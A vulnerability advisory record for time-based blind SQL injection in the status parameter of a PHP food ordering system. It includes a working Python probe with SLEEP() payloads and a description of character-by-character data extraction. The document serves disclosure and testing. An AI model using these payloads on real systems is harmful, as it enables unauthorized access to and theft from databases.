| Title | code-projects Simple Food Ordering System in PHP 1.0 SQL Injection |
|---|
| Description | code-projects Simple Food Ordering System in PHP 1.0 is vulnerable to time-based blind SQL injection through the status parameter of the all-tickets.php endpoint.
The application embeds the user-supplied status value in an SQL query without validating it or using a parameterized query, so an attacker can append SQL of their own to it. Because the injection is blind (neither query output nor a database error is returned to the client), it is confirmed with a time-delay function such as SLEEP(): a measurable delay in the response shows that the injected SQL was executed, and by making the delay conditional on a comparison (for example, on one character of a table name) an attacker can extract information from the backend database one answer at a time.
The vulnerability is triggered by sending an HTTP request whose status parameter carries a time-based payload. When the application processes it, the database executes the injected SLEEP() call and the response is delayed by the requested number of seconds. To attribute the delay to the injection rather than to network or server latency, the response time should be compared with a baseline request carrying a benign value and the measurement repeated several times.
Successful exploitation could allow an attacker to enumerate the database structure and extract sensitive information; depending on the query context, the privileges of the database account and whether the driver executes stacked queries, it may also permit bypassing authentication or modifying database contents. |
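The timing check described above, written out as an added example (this is not code from the project or from the submitter). The endpoint and parameter names come from the advisory; the base URL, the payload shapes for the three quoting contexts, the delay length and the decision threshold are assumptions for illustration. The sender is pluggable so the decision logic can be exercised without a live target.

```python
"""Time-based blind SQL injection probe for the all-tickets.php `status` parameter.

Added example, not the project's or the submitter's code. The endpoint and
parameter names are from the advisory; BASE_URL, the payload shapes and the
delay threshold are assumptions.
"""
import time
import urllib.error
import urllib.parse
import urllib.request
from statistics import median
from typing import Callable, Dict, List

# Assumed local test instance; point this at the host under test.
BASE_URL = "http://localhost/food-ordering/all-tickets.php"
DELAY = 5  # seconds requested from SLEEP() in each injected payload

# A benign value for the baseline and one SLEEP() payload per common quoting
# context. Which one fires depends on how the query embeds `status`
# (numeric, single-quoted or double-quoted); the shapes are assumptions.
BENIGN = "1"
PAYLOADS = {
    "numeric": f"1 AND SLEEP({DELAY})",
    "single-quote": f"1' AND SLEEP({DELAY})-- -",
    "double-quote": f'1" AND SLEEP({DELAY})-- -',
}


def build_url(status: str, base_url: str = BASE_URL) -> str:
    """Return the GET URL with the status value URL-encoded."""
    return base_url + "?" + urllib.parse.urlencode({"status": status})


def timed_get(url: str, timeout: float = 30.0) -> float:
    """Issue one HTTP GET and return the elapsed wall-clock seconds."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # a 4xx/5xx response still tells us how long the query took
    return time.monotonic() - start


def is_delayed(baseline: List[float], injected: List[float],
               delay: float = DELAY) -> bool:
    """True if the injected requests took roughly `delay` seconds longer.

    Medians are compared rather than single samples so that one slow
    request (network jitter, a busy server) does not give a false positive.
    The 0.8 factor tolerates clock and scheduling slop; it is an assumption.
    """
    return median(injected) - median(baseline) >= 0.8 * delay


def probe(send: Callable[[str], float] = timed_get,
          runs: int = 3) -> Dict[str, bool]:
    """Measure each payload against a fresh baseline; return {context: delayed?}.

    `send` takes a URL and returns the response time in seconds, so a
    recorded or simulated transport can be substituted for timed_get.
    """
    results: Dict[str, bool] = {}
    for name, payload in PAYLOADS.items():
        # Re-measure the baseline per payload so load changes during the
        # run do not skew the comparison.
        baseline = [send(build_url(BENIGN)) for _ in range(runs)]
        injected = [send(build_url(payload)) for _ in range(runs)]
        results[name] = is_delayed(baseline, injected)
    return results


if __name__ == "__main__":
    for context, delayed in probe().items():
        print(f"{context:13s} {'DELAYED (injectable)' if delayed else 'no delay'}")
```

Run it against a local copy of the application and only a context whose payload closes the original quoting correctly will show the delay; a payload that lands inside a string literal is just text to the database and returns at baseline speed. A delay on every payload, including ones that cannot parse, more likely means the application is slow or erroring than that it is injectable, so re-test with SLEEP(0) as a control before drawing a conclusion.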
|---|
| Source | https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/SQL%20Injection%20(Time-Based%20Blind)Simple%20Food%20Ordering%20System%20in%20PHP.md?plain=1 |
|---|
| User | AhmadMarzouk (UID 95993) |
|---|
| Submission | 03/07/2026 00:19 |
|---|
| Moderation | 03/21/2026 09:03 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 352321 [code-projects Simple Food Ordering System 1.0 all-tickets.php Status sql injection] |
|---|
| Points | 20 |
|---|